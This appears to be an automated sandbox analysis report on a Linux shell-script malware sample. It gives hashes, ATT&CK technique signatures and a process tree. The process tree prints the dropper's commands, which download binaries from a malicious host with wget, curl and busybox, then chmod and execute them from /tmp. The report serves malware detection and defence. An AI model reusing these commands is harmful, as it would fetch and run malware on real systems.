Analysis
-
max time kernel
149s -
max time network
20s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
-
Size
10KB
-
MD5
b319003c3c601274b8d3c96e303370c0
-
SHA1
9fe9064eb8767a3ea42c466bf21bce04eee50006
-
SHA256
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d
-
SHA512
d215c64d523bfa6118135a76e27c20d1e7c53b3875d78412c3a25647e0075ee43bce16c44821f92b0acf65cd485b6f3067fc9beadb5daa282a1ba39768c33394
-
SSDEEP
192:voNYIHKWYUzPf7v6qfo0M+//YJSw1zPL36qfo0G//YJXIYIHKWe:voOq76qfo0M+//YJSwh6qfo0G//YJX9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 744 chmod 770 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK 746 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo 771 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 750 wget 758 curl 765 busybox 777 wget 790 curl 711 wget 721 curl 732 busybox -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK curl File opened for modification /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo curl
Processes
-
/tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh/tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:765
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:776
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:777
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:790
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97